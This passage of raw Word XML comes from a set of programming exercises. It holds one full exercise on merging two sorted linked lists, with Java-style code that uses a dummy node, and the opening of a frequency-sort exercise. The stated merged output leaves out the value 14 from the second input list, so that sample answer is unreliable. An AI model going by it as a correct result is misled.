        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="336" w:name="_Toc196307816"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00E111CA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Merge two sorted linked list</w:t>
      </w:r>
      <w:bookmarkEnd w:id="336"/>
    </w:p>
    <w:p w14:paraId="46DF6D62" w14:textId="7A1163AE" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00055F96">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00055F96" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Merge two sorted linked lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5BCC03" w14:textId="0936E905" w:rsidR="00055F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00055F96" w:rsidP="00055F96">
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Input: list1 = 10, 20,30,40;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAE3753" w14:textId="36697ABE" w:rsidR="00055F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00055F96" w:rsidP="00055F96">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">            list2 = 11,13,14,21,22,33,35;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7FD178" w14:textId="0796AD68" w:rsidR="00055F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00055F96" w:rsidP="00055F96">
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Output: Mergedlist = 10,11,13,20,21,22,30,33,35,40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04742751" w14:textId="038C331F" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FD3D51D"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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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Nod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CA36EBD"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val</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DBFACA"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Nod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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4630DEB7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDCE952"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Node</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va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4EFDCA2"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val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val</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F017A1"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x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p>
    <w:p w14:paraId="55C76117"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CE494E2"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483080A9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C4B614"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ergeSortedLinkedList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089D936"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635EAC14"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ethod to merge two sorted linked lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FC75B3"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mergeSortedLists</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ListNode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lis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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lis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D3C263A"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e a dummy node to simplify the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57933C83"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> dumm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Nod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46854555"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> curre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dummy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C19C42"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B94434D"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ointers for both lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E6CB14"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> p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list1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E096A40"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> p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list2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3DE4A2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5378DAFD"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raverse both lists and merge them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E760854"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whi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p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amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> p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12A7859"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val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p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va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557D583"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curren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x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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A6BAB7"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p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1</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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3855B3D5"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ls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AE0B271"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curren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x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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292A7E81"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p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2</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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E43F274"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FB932F1"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curre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urren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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE4297C"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2183D1D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ED2473"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f there are remaining nodes in list1 or list2, append them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029C4259"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p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FAA1065"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curren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x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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A43D825"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ls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p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7C7F20A"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curren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x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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9D2101"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308061E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF9653"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dummy</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x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he merged list starts from dummy.next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D96B76F"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A07E988"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C96AF77"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ethod to print the linked list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD656BF"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printLis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ListNode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hea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8CADA98"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> curre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head</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3930C0C7"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whi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curre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E6057AE"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urre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val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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71106954"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curre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urren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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA5A16C"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62E60E8"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p>
    <w:p w14:paraId="6C4898B8"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817AF2C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA80D36"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ethod to create a linked list from an array of integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0FD5D6"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> createLis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38B7173"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ar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length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p>
    <w:p w14:paraId="678C023F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F10F1"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hea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Nod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rr</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6B79B029"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> curre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head</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36680118"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EFEBFD2"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curren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x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Nod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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E11CDC8"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curre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urren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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C103A1D"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59236D1"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head</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554D9FF4"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DFE3E0B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9EDCC6"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2887B4A"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nput lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EE73D1"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list1Arra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40</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDDD9AB"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list2Arra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4</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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF42632"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046A4B65"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e linked lists from arrays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDB25A6"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> list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reate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ist1Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4047D6"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> list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reate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ist2Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310EABC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B09E9DE"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erge the two sorted linked lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065DACA4"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mergedLis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ergeSortedLis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is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list2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B4C287"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B97A2A9"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int the merged linked list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034823A3"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Merged List: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018BC99C"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print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ergedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC20B49" w14:textId="77777777"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8B512C4" w14:textId="39F16DB0" w:rsidR="00A47541" w:rsidRPr="00CE4B95"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65807A88" w14:textId="77777777" w:rsidR="009F7DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="009F7DB6" w:rsidP="009F7DB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A31A22" w14:textId="255E1406" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="337" w:name="_Toc196307817"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="0015412A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Sort array with decreasing frequency of element</w:t>
      </w:r>
      <w:bookmarkEnd w:id="337"/>
    </w:p>
    <w:p w14:paraId="162E477F" w14:textId="630DD308" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00055F96">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00055F96" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Sort array with decreasing frequency of element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC30A7D" w14:textId="77777777" w:rsidR="00055F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00055F96" w:rsidP="00055F96">
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Input - 9,5,6,9,6,1,.2,9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAA6CAD" w14:textId="447623B1" w:rsidR="00055F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00055F96" w:rsidP="00055F96">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
